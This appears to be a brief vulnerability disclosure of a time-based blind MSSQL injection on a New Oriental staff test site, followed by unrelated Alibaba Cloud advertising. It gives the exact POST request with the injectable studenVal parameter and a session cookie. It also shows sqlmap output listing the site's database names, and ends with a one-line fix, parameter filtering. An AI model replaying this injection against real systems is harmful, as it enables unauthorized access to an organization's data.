MSSQL blind injection on a site in New Oriental
MSSQL blind injection on a site in New Oriental
Injection point:
POST /p/Handler/ApiHandler.ashx HTTP/1.1Content-Length: 87Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://xytest.staff.xdf.cnCookie: ASP.NET_SessionId=hkjmbgvondvsrk55zj1jxc45Host: xytest.staff.xdf.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*OpType=IsValidate&studenType=3&studenVal=123456*%20--%20The studenVal parameter can be injected. MSSQL time blind.
current database: 'NISmember0311'back-end DBMS: Microsoft SQL Server 2008[11:36:03] [INFO] fetching database names[11:36:03] [INFO] fetching number of databases[11:36:03] [INFO] resumed: 59[11:36:03] [INFO] resumed: A2[11:36:03] [INFO] resumed: aaa[11:36:03] [INFO] resumed: AD_PASSPORT_DB[11:36:03] [INFO] resumed: API[11:36:03] [INFO] resumed: aspnetdb[11:36:03] [INFO] resumed: BJ20140519[11:36:03] [INFO] resumed: BJ20140520[11:36:03] [INFO] resumed: BJ20140606[11:36:03] [INFO] resumed: BJ201406061400[11:36:03] [INFO] resumed: BJ20140714[11:36:03] [INFO] resumed: BJ20140714_001[11:36:03] [INFO] resumed: BJ20140915[11:36:03] [INFO] resumed: bjnis_crm[11:36:03] [INFO] resumed: BJTEST[11:36:03] [INFO] resumed: BJTEST_DY[11:36:03] [INFO] resumed: bushutest[11:36:03] [INFO] resumed: CQ0825[11:36:03] [INFO] resumed: CQNIS0519[11:36:03] [INFO] resumed: CS0818[11:36:03] [INFO] resumed: DevRequireThere are 59 databases and only a portion of them are run.
Solution:
Parameter Filtering
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
